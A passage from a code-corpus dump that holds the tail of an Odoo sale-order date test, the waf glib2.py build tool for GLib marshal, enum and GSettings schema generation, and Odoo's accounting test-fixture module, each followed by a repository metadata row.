(0, 0, {'name': product_C.name, 'product_id': product_C.id, 'customer_lead': product_C.sale_delay, 'product_uom_qty': 5})
],
})
# if Shipping Policy is set to `direct`(when SO is in draft state) then expected date should be
# current date + shortest lead time from all of it's order lines
expected_date = fields.Datetime.to_string(fields.Datetime.from_string(fields.Datetime.now()) + timedelta(days=5))
self.assertEquals(expected_date, sale_order.expected_date, "Wrong expected date on sale order!")
# if Shipping Policy is set to `one`(when SO is in draft state) then expected date should be
# current date + longest lead time from all of it's order lines
sale_order.write({'picking_policy': 'one'})
expected_date = fields.Datetime.to_string(fields.Datetime.from_string(fields.Datetime.now()) + timedelta(days=15))
self.assertEquals(expected_date, sale_order.expected_date, "Wrong expected date on sale order!")
sale_order.action_confirm()
# Setting confirmation date of SO to 5 days from today so that the expected/effective date could be checked
# against real confirmation date
confirm_date = fields.Datetime.from_string(fields.Datetime.now()) + timedelta(days=5)
sale_order.write({'confirmation_date': confirm_date})
# if Shipping Policy is set to `one`(when SO is confirmed) then expected date should be
# SO confirmation date + longest lead time from all of it's order lines
expected_date = fields.Datetime.to_string(confirm_date + timedelta(days=15))
self.assertEquals(expected_date, sale_order.expected_date, "Wrong expected date on sale order!")
# if Shipping Policy is set to `direct`(when SO is confirmed) then expected date should be
# SO confirmation date + shortest lead time from all of it's order lines
sale_order.write({'picking_policy': 'direct'})
expected_date = fields.Datetime.to_string(confirm_date + timedelta(days=5))
self.assertEquals(expected_date, sale_order.expected_date, "Wrong expected date on sale order!")
# Check effective date, it should be date on which the first shipment successfully delivered to customer
picking = sale_order.picking_ids[0]
for ml in picking.move_line_ids:
ml.qty_done = ml.product_uom_qty
picking.action_done()
self.assertEquals(picking.state, 'done', "Picking not processed correctly!")
self.assertEquals(fields.Date.today(), sale_order.effective_date, "Wrong effective date on sale order!")
| agpl-3.0 | -8,451,965,481,187,862,000 | 52.073171 | 138 | 0.637408 | false |
drayside/kodkod | libs/.waf-1.6.6-c57dd0fa119e23d36c23d598487c6880/waflib/Tools/glib2.py | 1 | 8301 | #! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/svn/docs/wafbook/single.html#_obtaining_the_waf_file
import os
from waflib import Task,Utils,Options,Errors,Logs
from waflib.TaskGen import taskgen_method,before_method,after_method,feature
def add_marshal_file(self,filename,prefix):
if not hasattr(self,'marshal_list'):
self.marshal_list=[]
self.meths.append('process_marshal')
self.marshal_list.append((filename,prefix))
def process_marshal(self):
for f,prefix in getattr(self,'marshal_list',[]):
node=self.path.find_resource(f)
if not node:
raise Errors.WafError('file not found %r'%f)
h_node=node.change_ext('.h')
c_node=node.change_ext('.c')
task=self.create_task('glib_genmarshal',node,[h_node,c_node])
task.env.GLIB_GENMARSHAL_PREFIX=prefix
self.source=self.to_nodes(getattr(self,'source',[]))
self.source.append(c_node)
class glib_genmarshal(Task.Task):
def run(self):
bld=self.inputs[0].__class__.ctx
get=self.env.get_flat
cmd1="%s %s --prefix=%s --header > %s"%(get('GLIB_GENMARSHAL'),self.inputs[0].srcpath(),get('GLIB_GENMARSHAL_PREFIX'),self.outputs[0].abspath())
ret=bld.exec_command(cmd1)
if ret:return ret
c='''#include "%s"\n'''%self.outputs[0].name
self.outputs[1].write(c)
cmd2="%s %s --prefix=%s --body >> %s"%(get('GLIB_GENMARSHAL'),self.inputs[0].srcpath(),get('GLIB_GENMARSHAL_PREFIX'),self.outputs[1].abspath())
return bld.exec_command(cmd2)
vars=['GLIB_GENMARSHAL_PREFIX','GLIB_GENMARSHAL']
color='BLUE'
ext_out=['.h']
def add_enums_from_template(self,source='',target='',template='',comments=''):
if not hasattr(self,'enums_list'):
self.enums_list=[]
self.meths.append('process_enums')
self.enums_list.append({'source':source,'target':target,'template':template,'file-head':'','file-prod':'','file-tail':'','enum-prod':'','value-head':'','value-prod':'','value-tail':'','comments':comments})
def add_enums(self,source='',target='',file_head='',file_prod='',file_tail='',enum_prod='',value_head='',value_prod='',value_tail='',comments=''):
if not hasattr(self,'enums_list'):
self.enums_list=[]
self.meths.append('process_enums')
self.enums_list.append({'source':source,'template':'','target':target,'file-head':file_head,'file-prod':file_prod,'file-tail':file_tail,'enum-prod':enum_prod,'value-head':value_head,'value-prod':value_prod,'value-tail':value_tail,'comments':comments})
def process_enums(self):
for enum in getattr(self,'enums_list',[]):
task=self.create_task('glib_mkenums')
env=task.env
inputs=[]
source_list=self.to_list(enum['source'])
if not source_list:
raise Errors.WafError('missing source '+str(enum))
source_list=[self.path.find_resource(k)for k in source_list]
inputs+=source_list
env['GLIB_MKENUMS_SOURCE']=[k.abspath()for k in source_list]
if not enum['target']:
raise Errors.WafError('missing target '+str(enum))
tgt_node=self.path.find_or_declare(enum['target'])
if tgt_node.name.endswith('.c'):
self.source.append(tgt_node)
env['GLIB_MKENUMS_TARGET']=tgt_node.abspath()
options=[]
if enum['template']:
template_node=self.path.find_resource(enum['template'])
options.append('--template %s'%(template_node.abspath()))
inputs.append(template_node)
params={'file-head':'--fhead','file-prod':'--fprod','file-tail':'--ftail','enum-prod':'--eprod','value-head':'--vhead','value-prod':'--vprod','value-tail':'--vtail','comments':'--comments'}
for param,option in params.items():
if enum[param]:
options.append('%s %r'%(option,enum[param]))
env['GLIB_MKENUMS_OPTIONS']=' '.join(options)
task.set_inputs(inputs)
task.set_outputs(tgt_node)
class glib_mkenums(Task.Task):
run_str='${GLIB_MKENUMS} ${GLIB_MKENUMS_OPTIONS} ${GLIB_MKENUMS_SOURCE} > ${GLIB_MKENUMS_TARGET}'
color='PINK'
ext_out=['.h']
def add_settings_schemas(self,filename_list):
if not hasattr(self,'settings_schema_files'):
self.settings_schema_files=[]
if not isinstance(filename_list,list):
filename_list=[filename_list]
self.settings_schema_files.extend(filename_list)
def add_settings_enums(self,namespace,filename_list):
if hasattr(self,'settings_enum_namespace'):
raise Errors.WafError("Tried to add gsettings enums to '%s' more than once"%self.name)
self.settings_enum_namespace=namespace
if type(filename_list)!='list':
filename_list=[filename_list]
self.settings_enum_files=filename_list
def r_change_ext(self,ext):
name=self.name
k=name.rfind('.')
if k>=0:
name=name[:k]+ext
else:
name=name+ext
return self.parent.find_or_declare([name])
def process_settings(self):
enums_tgt_node=[]
install_files=[]
settings_schema_files=getattr(self,'settings_schema_files',[])
if settings_schema_files and not self.env['GLIB_COMPILE_SCHEMAS']:
raise Errors.WafError("Unable to process GSettings schemas - glib-compile-schemas was not found during configure")
if hasattr(self,'settings_enum_files'):
enums_task=self.create_task('glib_mkenums')
source_list=self.settings_enum_files
source_list=[self.path.find_resource(k)for k in source_list]
enums_task.set_inputs(source_list)
enums_task.env['GLIB_MKENUMS_SOURCE']=[k.abspath()for k in source_list]
target=self.settings_enum_namespace+'.enums.xml'
tgt_node=self.path.find_or_declare(target)
enums_task.set_outputs(tgt_node)
enums_task.env['GLIB_MKENUMS_TARGET']=tgt_node.abspath()
enums_tgt_node=[tgt_node]
install_files.append(target)
options='--comments "<!-- @comment@ -->" --fhead "<schemalist>" --vhead " <@type@ id=\\"%s.@EnumName@\\">" --vprod " <value nick=\\"@valuenick@\\" value=\\"@valuenum@\\"/>" --vtail " </@type@>" --ftail "</schemalist>" '%(self.settings_enum_namespace)
enums_task.env['GLIB_MKENUMS_OPTIONS']=options
for schema in settings_schema_files:
schema_task=self.create_task('glib_validate_schema')
install_files.append(schema)
schema_node=self.path.find_resource(schema)
if not schema_node:
raise Errors.WafError("Cannot find the schema file '%s'"%schema)
source_list=enums_tgt_node+[schema_node]
schema_task.set_inputs(source_list)
schema_task.env['GLIB_COMPILE_SCHEMAS_OPTIONS']=[("--schema-file="+k.abspath())for k in source_list]
target_node=r_change_ext(schema_node,'.xml.valid')
schema_task.set_outputs(target_node)
schema_task.env['GLIB_VALIDATE_SCHEMA_OUTPUT']=target_node.abspath()
def compile_schemas_callback(bld):
if not bld.is_install:return
Logs.pprint('YELLOW','Updating GSettings schema cache')
command=Utils.subst_vars("${GLIB_COMPILE_SCHEMAS} ${GSETTINGSSCHEMADIR}",bld.env)
ret=self.bld.exec_command(command)
if self.bld.is_install:
if not self.env['GSETTINGSSCHEMADIR']:
raise Errors.WafError('GSETTINGSSCHEMADIR not defined (should have been set up automatically during configure)')
if install_files:
self.bld.install_files(self.env['GSETTINGSSCHEMADIR'],install_files)
if not hasattr(self.bld,'_compile_schemas_registered'):
self.bld.add_post_fun(compile_schemas_callback)
self.bld._compile_schemas_registered=True
class glib_validate_schema(Task.Task):
run_str='rm -f ${GLIB_VALIDATE_SCHEMA_OUTPUT} && ${GLIB_COMPILE_SCHEMAS} --dry-run ${GLIB_COMPILE_SCHEMAS_OPTIONS} && touch ${GLIB_VALIDATE_SCHEMA_OUTPUT}'
color='PINK'
def configure(conf):
conf.find_program('glib-genmarshal',var='GLIB_GENMARSHAL')
conf.find_perl_program('glib-mkenums',var='GLIB_MKENUMS')
conf.find_program('glib-compile-schemas',var='GLIB_COMPILE_SCHEMAS',mandatory=False)
def getstr(varname):
return getattr(Options.options,varname,getattr(conf.env,varname,''))
gsettingsschemadir=getstr('GSETTINGSSCHEMADIR')
if not gsettingsschemadir:
datadir=getstr('DATADIR')
if not datadir:
prefix=conf.env['PREFIX']
datadir=os.path.join(prefix,'share')
gsettingsschemadir=os.path.join(datadir,'glib-2.0','schemas')
conf.env['GSETTINGSSCHEMADIR']=gsettingsschemadir
def options(opt):
opt.add_option('--gsettingsschemadir',help='GSettings schema location [Default: ${datadir}/glib-2.0/schemas]',default='',dest='GSETTINGSSCHEMADIR')
taskgen_method(add_marshal_file)
before_method('process_source')(process_marshal)
taskgen_method(add_enums_from_template)
taskgen_method(add_enums)
before_method('process_source')(process_enums)
taskgen_method(add_settings_schemas)
taskgen_method(add_settings_enums)
feature('glib2')(process_settings) | mit | 2,504,423,353,258,335,700 | 46.712644 | 257 | 0.720757 | false |
pepetreshere/odoo | addons/account/tests/common.py | 1 | 31193 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import fields
from odoo.tests.common import SavepointCase, HttpSavepointCase, tagged, Form
import time
import base64
from lxml import etree
@tagged('post_install', '-at_install')
class AccountTestInvoicingCommon(SavepointCase):
@classmethod
def copy_account(cls, account):
suffix_nb = 1
while True:
new_code = '%s (%s)' % (account.code, suffix_nb)
if account.search_count([('company_id', '=', account.company_id.id), ('code', '=', new_code)]):
suffix_nb += 1
else:
return account.copy(default={'code': new_code})
@classmethod
def setUpClass(cls, chart_template_ref=None):
super(AccountTestInvoicingCommon, cls).setUpClass()
if chart_template_ref:
chart_template = cls.env.ref(chart_template_ref)
else:
chart_template = cls.env.ref('l10n_generic_coa.configurable_chart_template', raise_if_not_found=False)
if not chart_template:
cls.tearDownClass()
# skipTest raises exception
cls.skipTest(cls, "Accounting Tests skipped because the user's company has no chart of accounts.")
# Create user.
user = cls.env['res.users'].create({
'name': 'Because I am accountman!',
'login': 'accountman',
'password': 'accountman',
'groups_id': [(6, 0, cls.env.user.groups_id.ids), (4, cls.env.ref('account.group_account_user').id)],
})
user.partner_id.email = 'accountman@test.com'
# Shadow the current environment/cursor with one having the report user.
# This is mandatory to test access rights.
cls.env = cls.env(user=user)
cls.cr = cls.env.cr
cls.company_data_2 = cls.setup_company_data('company_2_data', chart_template=chart_template)
cls.company_data = cls.setup_company_data('company_1_data', chart_template=chart_template)
user.write({
'company_ids': [(6, 0, (cls.company_data['company'] + cls.company_data_2['company']).ids)],
'company_id': cls.company_data['company'].id,
})
cls.currency_data = cls.setup_multi_currency_data()
# ==== Taxes ====
cls.tax_sale_a = cls.company_data['default_tax_sale']
cls.tax_sale_b = cls.company_data['default_tax_sale'].copy()
cls.tax_purchase_a = cls.company_data['default_tax_purchase']
cls.tax_purchase_b = cls.company_data['default_tax_purchase'].copy()
cls.tax_armageddon = cls.setup_armageddon_tax('complex_tax', cls.company_data)
# ==== Products ====
cls.product_a = cls.env['product.product'].create({
'name': 'product_a',
'uom_id': cls.env.ref('uom.product_uom_unit').id,
'lst_price': 1000.0,
'standard_price': 800.0,
'property_account_income_id': cls.company_data['default_account_revenue'].id,
'property_account_expense_id': cls.company_data['default_account_expense'].id,
'taxes_id': [(6, 0, cls.tax_sale_a.ids)],
'supplier_taxes_id': [(6, 0, cls.tax_purchase_a.ids)],
})
cls.product_b = cls.env['product.product'].create({
'name': 'product_b',
'uom_id': cls.env.ref('uom.product_uom_dozen').id,
'lst_price': 200.0,
'standard_price': 160.0,
'property_account_income_id': cls.copy_account(cls.company_data['default_account_revenue']).id,
'property_account_expense_id': cls.copy_account(cls.company_data['default_account_expense']).id,
'taxes_id': [(6, 0, (cls.tax_sale_a + cls.tax_sale_b).ids)],
'supplier_taxes_id': [(6, 0, (cls.tax_purchase_a + cls.tax_purchase_b).ids)],
})
# ==== Fiscal positions ====
cls.fiscal_pos_a = cls.env['account.fiscal.position'].create({
'name': 'fiscal_pos_a',
'tax_ids': [
(0, None, {
'tax_src_id': cls.tax_sale_a.id,
'tax_dest_id': cls.tax_sale_b.id,
}),
(0, None, {
'tax_src_id': cls.tax_purchase_a.id,
'tax_dest_id': cls.tax_purchase_b.id,
}),
],
'account_ids': [
(0, None, {
'account_src_id': cls.product_a.property_account_income_id.id,
'account_dest_id': cls.product_b.property_account_income_id.id,
}),
(0, None, {
'account_src_id': cls.product_a.property_account_expense_id.id,
'account_dest_id': cls.product_b.property_account_expense_id.id,
}),
],
})
# ==== Payment terms ====
cls.pay_terms_a = cls.env.ref('account.account_payment_term_immediate')
cls.pay_terms_b = cls.env['account.payment.term'].create({
'name': '30% Advance End of Following Month',
'note': 'Payment terms: 30% Advance End of Following Month',
'line_ids': [
(0, 0, {
'value': 'percent',
'value_amount': 30.0,
'sequence': 400,
'days': 0,
'option': 'day_after_invoice_date',
}),
(0, 0, {
'value': 'balance',
'value_amount': 0.0,
'sequence': 500,
'days': 31,
'option': 'day_following_month',
}),
],
})
# ==== Partners ====
cls.partner_a = cls.env['res.partner'].create({
'name': 'partner_a',
'property_payment_term_id': cls.pay_terms_a.id,
'property_supplier_payment_term_id': cls.pay_terms_a.id,
'property_account_receivable_id': cls.company_data['default_account_receivable'].id,
'property_account_payable_id': cls.company_data['default_account_payable'].id,
'company_id': False,
})
cls.partner_b = cls.env['res.partner'].create({
'name': 'partner_b',
'property_payment_term_id': cls.pay_terms_b.id,
'property_supplier_payment_term_id': cls.pay_terms_b.id,
'property_account_position_id': cls.fiscal_pos_a.id,
'property_account_receivable_id': cls.company_data['default_account_receivable'].copy().id,
'property_account_payable_id': cls.company_data['default_account_payable'].copy().id,
'company_id': False,
})
# ==== Cash rounding ====
cls.cash_rounding_a = cls.env['account.cash.rounding'].create({
'name': 'add_invoice_line',
'rounding': 0.05,
'strategy': 'add_invoice_line',
'profit_account_id': cls.company_data['default_account_revenue'].copy().id,
'loss_account_id': cls.company_data['default_account_expense'].copy().id,
'rounding_method': 'UP',
})
cls.cash_rounding_b = cls.env['account.cash.rounding'].create({
'name': 'biggest_tax',
'rounding': 0.05,
'strategy': 'biggest_tax',
'rounding_method': 'DOWN',
})
@classmethod
def setup_company_data(cls, company_name, chart_template=None, **kwargs):
''' Create a new company having the name passed as parameter.
A chart of accounts will be installed to this company: the same as the current company one.
The current user will get access to this company.
:param chart_template: The chart template to be used on this new company.
:param company_name: The name of the company.
:return: A dictionary will be returned containing all relevant accounting data for testing.
'''
def search_account(company, chart_template, field_name, domain):
template_code = chart_template[field_name].code
domain = [('company_id', '=', company.id)] + domain
account = None
if template_code:
account = cls.env['account.account'].search(domain + [('code', '=like', template_code + '%')], limit=1)
if not account:
account = cls.env['account.account'].search(domain, limit=1)
return account
chart_template = chart_template or cls.env.company.chart_template_id
company = cls.env['res.company'].create({
'name': company_name,
**kwargs,
})
cls.env.user.company_ids |= company
chart_template.try_loading(company=company)
# The currency could be different after the installation of the chart template.
if kwargs.get('currency_id'):
company.write({'currency_id': kwargs['currency_id']})
return {
'company': company,
'currency': company.currency_id,
'default_account_revenue': cls.env['account.account'].search([
('company_id', '=', company.id),
('user_type_id', '=', cls.env.ref('account.data_account_type_revenue').id)
], limit=1),
'default_account_expense': cls.env['account.account'].search([
('company_id', '=', company.id),
('user_type_id', '=', cls.env.ref('account.data_account_type_expenses').id)
], limit=1),
'default_account_receivable': search_account(company, chart_template, 'property_account_receivable_id', [
('user_type_id.type', '=', 'receivable')
]),
'default_account_payable': cls.env['account.account'].search([
('company_id', '=', company.id),
('user_type_id.type', '=', 'payable')
], limit=1),
'default_account_assets': cls.env['account.account'].search([
('company_id', '=', company.id),
('user_type_id', '=', cls.env.ref('account.data_account_type_current_assets').id)
], limit=1),
'default_account_tax_sale': company.account_sale_tax_id.mapped('invoice_repartition_line_ids.account_id'),
'default_account_tax_purchase': company.account_purchase_tax_id.mapped('invoice_repartition_line_ids.account_id'),
'default_journal_misc': cls.env['account.journal'].search([
('company_id', '=', company.id),
('type', '=', 'general')
], limit=1),
'default_journal_sale': cls.env['account.journal'].search([
('company_id', '=', company.id),
('type', '=', 'sale')
], limit=1),
'default_journal_purchase': cls.env['account.journal'].search([
('company_id', '=', company.id),
('type', '=', 'purchase')
], limit=1),
'default_journal_bank': cls.env['account.journal'].search([
('company_id', '=', company.id),
('type', '=', 'bank')
], limit=1),
'default_journal_cash': cls.env['account.journal'].search([
('company_id', '=', company.id),
('type', '=', 'cash')
], limit=1),
'default_tax_sale': company.account_sale_tax_id,
'default_tax_purchase': company.account_purchase_tax_id,
}
@classmethod
def setup_multi_currency_data(cls, default_values={}, rate2016=3.0, rate2017=2.0):
foreign_currency = cls.env['res.currency'].create({
'name': 'Gold Coin',
'symbol': '☺',
'rounding': 0.001,
'position': 'after',
'currency_unit_label': 'Gold',
'currency_subunit_label': 'Silver',
**default_values,
})
rate1 = cls.env['res.currency.rate'].create({
'name': '2016-01-01',
'rate': rate2016,
'currency_id': foreign_currency.id,
'company_id': cls.env.company.id,
})
rate2 = cls.env['res.currency.rate'].create({
'name': '2017-01-01',
'rate': rate2017,
'currency_id': foreign_currency.id,
'company_id': cls.env.company.id,
})
return {
'currency': foreign_currency,
'rates': rate1 + rate2,
}
@classmethod
def setup_armageddon_tax(cls, tax_name, company_data):
return cls.env['account.tax'].create({
'name': '%s (group)' % tax_name,
'amount_type': 'group',
'amount': 0.0,
'children_tax_ids': [
(0, 0, {
'name': '%s (child 1)' % tax_name,
'amount_type': 'percent',
'amount': 20.0,
'price_include': True,
'include_base_amount': True,
'tax_exigibility': 'on_invoice',
'invoice_repartition_line_ids': [
(0, 0, {
'factor_percent': 100,
'repartition_type': 'base',
}),
(0, 0, {
'factor_percent': 40,
'repartition_type': 'tax',
'account_id': company_data['default_account_tax_sale'].id,
}),
(0, 0, {
'factor_percent': 60,
'repartition_type': 'tax',
# /!\ No account set.
}),
],
'refund_repartition_line_ids': [
(0, 0, {
'factor_percent': 100,
'repartition_type': 'base',
}),
(0, 0, {
'factor_percent': 40,
'repartition_type': 'tax',
'account_id': company_data['default_account_tax_sale'].id,
}),
(0, 0, {
'factor_percent': 60,
'repartition_type': 'tax',
# /!\ No account set.
}),
],
}),
(0, 0, {
'name': '%s (child 2)' % tax_name,
'amount_type': 'percent',
'amount': 10.0,
'tax_exigibility': 'on_payment',
'cash_basis_transition_account_id': company_data['default_account_tax_sale'].copy().id,
'invoice_repartition_line_ids': [
(0, 0, {
'factor_percent': 100,
'repartition_type': 'base',
}),
(0, 0, {
'factor_percent': 100,
'repartition_type': 'tax',
'account_id': company_data['default_account_tax_sale'].id,
}),
],
'refund_repartition_line_ids': [
(0, 0, {
'factor_percent': 100,
'repartition_type': 'base',
}),
(0, 0, {
'factor_percent': 100,
'repartition_type': 'tax',
'account_id': company_data['default_account_tax_sale'].id,
}),
],
}),
],
})
@classmethod
def init_invoice(cls, move_type, partner=None, invoice_date=None, post=False, products=[], amounts=[], taxes=None):
move_form = Form(cls.env['account.move'].with_context(default_move_type=move_type))
move_form.invoice_date = invoice_date or fields.Date.from_string('2019-01-01')
move_form.partner_id = partner or cls.partner_a
for product in products:
with move_form.invoice_line_ids.new() as line_form:
line_form.product_id = product
if taxes:
line_form.tax_ids.clear()
line_form.tax_ids.add(taxes)
for amount in amounts:
with move_form.invoice_line_ids.new() as line_form:
line_form.price_unit = amount
if taxes:
line_form.tax_ids.clear()
line_form.tax_ids.add(taxes)
rslt = move_form.save()
if post:
rslt.action_post()
return rslt
def assertInvoiceValues(self, move, expected_lines_values, expected_move_values):
def sort_lines(lines):
return lines.sorted(lambda line: (line.exclude_from_invoice_tab, not bool(line.tax_line_id), line.name or '', line.balance))
self.assertRecordValues(sort_lines(move.line_ids.sorted()), expected_lines_values)
self.assertRecordValues(sort_lines(move.invoice_line_ids.sorted()), expected_lines_values[:len(move.invoice_line_ids)])
self.assertRecordValues(move, [expected_move_values])
####################################################
# Xml Comparison
####################################################
def _turn_node_as_dict_hierarchy(self, node):
''' Turn the node as a python dictionary to be compared later with another one.
Allow to ignore the management of namespaces.
:param node: A node inside an xml tree.
:return: A python dictionary.
'''
tag_split = node.tag.split('}')
tag_wo_ns = tag_split[-1]
attrib_wo_ns = {k: v for k, v in node.attrib.items() if '}' not in k}
return {
'tag': tag_wo_ns,
'namespace': None if len(tag_split) < 2 else tag_split[0],
'text': (node.text or '').strip(),
'attrib': attrib_wo_ns,
'children': [self._turn_node_as_dict_hierarchy(child_node) for child_node in node.getchildren()],
}
def assertXmlTreeEqual(self, xml_tree, expected_xml_tree):
''' Compare two lxml.etree.
:param xml_tree: The current tree.
:param expected_xml_tree: The expected tree.
'''
def assertNodeDictEqual(node_dict, expected_node_dict):
''' Compare nodes created by the `_turn_node_as_dict_hierarchy` method.
:param node_dict: The node to compare with.
:param expected_node_dict: The expected node.
'''
# Check tag.
self.assertEqual(node_dict['tag'], expected_node_dict['tag'])
# Check attributes.
node_dict_attrib = {k: '___ignore___' if expected_node_dict['attrib'].get(k) == '___ignore___' else v
for k, v in node_dict['attrib'].items()}
expected_node_dict_attrib = {k: v for k, v in expected_node_dict['attrib'].items() if v != '___remove___'}
self.assertDictEqual(
node_dict_attrib,
expected_node_dict_attrib,
"Element attributes are different for node %s" % node_dict['tag'],
)
# Check text.
if expected_node_dict['text'] != '___ignore___':
self.assertEqual(
node_dict['text'],
expected_node_dict['text'],
"Element text are different for node %s" % node_dict['tag'],
)
# Check children.
self.assertEqual(
[child['tag'] for child in node_dict['children']],
[child['tag'] for child in expected_node_dict['children']],
"Number of children elements for node %s is different." % node_dict['tag'],
)
for child_node_dict, expected_child_node_dict in zip(node_dict['children'], expected_node_dict['children']):
assertNodeDictEqual(child_node_dict, expected_child_node_dict)
assertNodeDictEqual(
self._turn_node_as_dict_hierarchy(xml_tree),
self._turn_node_as_dict_hierarchy(expected_xml_tree),
)
def with_applied_xpath(self, xml_tree, xpath):
''' Applies the xpath to the xml_tree passed as parameter.
:param xml_tree: An instance of etree.
:param xpath: The xpath to apply as a string.
:return: The resulting etree after applying the xpaths.
'''
diff_xml_tree = etree.fromstring('<data>%s</data>' % xpath)
return self.env['ir.ui.view'].apply_inheritance_specs(xml_tree, diff_xml_tree)
def get_xml_tree_from_attachment(self, attachment):
''' Extract an instance of etree from an ir.attachment.
:param attachment: An ir.attachment.
:return: An instance of etree.
'''
return etree.fromstring(base64.b64decode(attachment.with_context(bin_size=False).datas))
def get_xml_tree_from_string(self, xml_tree_str):
''' Convert the string passed as parameter to an instance of etree.
:param xml_tree_str: A string representing an xml.
:return: An instance of etree.
'''
return etree.fromstring(xml_tree_str)
@tagged('post_install', '-at_install')
class AccountTestInvoicingHttpCommon(AccountTestInvoicingCommon, HttpSavepointCase):
pass
class TestAccountReconciliationCommon(AccountTestInvoicingCommon):
"""Tests for reconciliation (account.tax)
Test used to check that when doing a sale or purchase invoice in a different currency,
the result will be balanced.
"""
@classmethod
def setUpClass(cls, chart_template_ref=None):
super().setUpClass(chart_template_ref=chart_template_ref)
cls.company = cls.company_data['company']
cls.company.currency_id = cls.env.ref('base.EUR')
cls.partner_agrolait = cls.env['res.partner'].create({
'name': 'Deco Addict',
'is_company': True,
'country_id': cls.env.ref('base.us').id,
})
cls.partner_agrolait_id = cls.partner_agrolait.id
cls.currency_swiss_id = cls.env.ref("base.CHF").id
cls.currency_usd_id = cls.env.ref("base.USD").id
cls.currency_euro_id = cls.env.ref("base.EUR").id
cls.account_rcv = cls.company_data['default_account_receivable']
cls.account_rsa = cls.company_data['default_account_payable']
cls.product = cls.env['product.product'].create({
'name': 'Product Product 4',
'standard_price': 500.0,
'list_price': 750.0,
'type': 'consu',
'categ_id': cls.env.ref('product.product_category_all').id,
})
cls.bank_journal_euro = cls.env['account.journal'].create({'name': 'Bank', 'type': 'bank', 'code': 'BNK67'})
cls.account_euro = cls.bank_journal_euro.default_account_id
cls.bank_journal_usd = cls.env['account.journal'].create({'name': 'Bank US', 'type': 'bank', 'code': 'BNK68', 'currency_id': cls.currency_usd_id})
cls.account_usd = cls.bank_journal_usd.default_account_id
cls.fx_journal = cls.company.currency_exchange_journal_id
cls.diff_income_account = cls.company.income_currency_exchange_account_id
cls.diff_expense_account = cls.company.expense_currency_exchange_account_id
cls.inbound_payment_method = cls.env['account.payment.method'].create({
'name': 'inbound',
'code': 'IN',
'payment_type': 'inbound',
})
cls.expense_account = cls.company_data['default_account_expense']
# cash basis intermediary account
cls.tax_waiting_account = cls.env['account.account'].create({
'name': 'TAX_WAIT',
'code': 'TWAIT',
'user_type_id': cls.env.ref('account.data_account_type_current_liabilities').id,
'reconcile': True,
'company_id': cls.company.id,
})
# cash basis final account
cls.tax_final_account = cls.env['account.account'].create({
'name': 'TAX_TO_DEDUCT',
'code': 'TDEDUCT',
'user_type_id': cls.env.ref('account.data_account_type_current_assets').id,
'company_id': cls.company.id,
})
cls.tax_base_amount_account = cls.env['account.account'].create({
'name': 'TAX_BASE',
'code': 'TBASE',
'user_type_id': cls.env.ref('account.data_account_type_current_assets').id,
'company_id': cls.company.id,
})
cls.company.account_cash_basis_base_account_id = cls.tax_base_amount_account.id
# Journals
cls.purchase_journal = cls.company_data['default_journal_purchase']
cls.cash_basis_journal = cls.env['account.journal'].create({
'name': 'CABA',
'code': 'CABA',
'type': 'general',
})
cls.general_journal = cls.company_data['default_journal_misc']
# Tax Cash Basis
cls.tax_cash_basis = cls.env['account.tax'].create({
'name': 'cash basis 20%',
'type_tax_use': 'purchase',
'company_id': cls.company.id,
'amount': 20,
'tax_exigibility': 'on_payment',
'cash_basis_transition_account_id': cls.tax_waiting_account.id,
'invoice_repartition_line_ids': [
(0,0, {
'factor_percent': 100,
'repartition_type': 'base',
}),
(0,0, {
'factor_percent': 100,
'repartition_type': 'tax',
'account_id': cls.tax_final_account.id,
}),
],
'refund_repartition_line_ids': [
(0,0, {
'factor_percent': 100,
'repartition_type': 'base',
}),
(0,0, {
'factor_percent': 100,
'repartition_type': 'tax',
'account_id': cls.tax_final_account.id,
}),
],
})
cls.env['res.currency.rate'].create([
{
'currency_id': cls.env.ref('base.EUR').id,
'name': '2010-01-02',
'rate': 1.0,
}, {
'currency_id': cls.env.ref('base.USD').id,
'name': '2010-01-02',
'rate': 1.2834,
}, {
'currency_id': cls.env.ref('base.USD').id,
'name': time.strftime('%Y-06-05'),
'rate': 1.5289,
}
])
def _create_invoice(self, move_type='out_invoice', invoice_amount=50, currency_id=None, partner_id=None, date_invoice=None, payment_term_id=False, auto_validate=False):
date_invoice = date_invoice or time.strftime('%Y') + '-07-01'
invoice_vals = {
'move_type': move_type,
'partner_id': partner_id or self.partner_agrolait_id,
'invoice_date': date_invoice,
'date': date_invoice,
'invoice_line_ids': [(0, 0, {
'name': 'product that cost %s' % invoice_amount,
'quantity': 1,
'price_unit': invoice_amount,
'tax_ids': [(6, 0, [])],
})]
}
if payment_term_id:
invoice_vals['invoice_payment_term_id'] = payment_term_id
if currency_id:
invoice_vals['currency_id'] = currency_id
invoice = self.env['account.move'].with_context(default_move_type=type).create(invoice_vals)
if auto_validate:
invoice.action_post()
return invoice
def create_invoice(self, move_type='out_invoice', invoice_amount=50, currency_id=None):
return self._create_invoice(move_type=move_type, invoice_amount=invoice_amount, currency_id=currency_id, auto_validate=True)
def create_invoice_partner(self, move_type='out_invoice', invoice_amount=50, currency_id=None, partner_id=False, payment_term_id=False):
return self._create_invoice(
move_type=move_type,
invoice_amount=invoice_amount,
currency_id=currency_id,
partner_id=partner_id,
payment_term_id=payment_term_id,
auto_validate=True
)
def make_payment(self, invoice_record, bank_journal, amount=0.0, amount_currency=0.0, currency_id=None, reconcile_param=[]):
bank_stmt = self.env['account.bank.statement'].create({
'journal_id': bank_journal.id,
'date': time.strftime('%Y') + '-07-15',
'name': 'payment' + invoice_record.name,
'line_ids': [(0, 0, {
'payment_ref': 'payment',
'partner_id': self.partner_agrolait_id,
'amount': amount,
'amount_currency': amount_currency,
'foreign_currency_id': currency_id,
})],
})
bank_stmt.button_post()
bank_stmt.line_ids[0].reconcile(reconcile_param)
return bank_stmt
def make_customer_and_supplier_flows(self, invoice_currency_id, invoice_amount, bank_journal, amount, amount_currency, transaction_currency_id):
#we create an invoice in given invoice_currency
invoice_record = self.create_invoice(move_type='out_invoice', invoice_amount=invoice_amount, currency_id=invoice_currency_id)
#we encode a payment on it, on the given bank_journal with amount, amount_currency and transaction_currency given
line = invoice_record.line_ids.filtered(lambda line: line.account_id.user_type_id.type in ('receivable', 'payable'))
bank_stmt = self.make_payment(invoice_record, bank_journal, amount=amount, amount_currency=amount_currency, currency_id=transaction_currency_id, reconcile_param=[{'id': line.id}])
customer_move_lines = bank_stmt.line_ids.line_ids
#we create a supplier bill in given invoice_currency
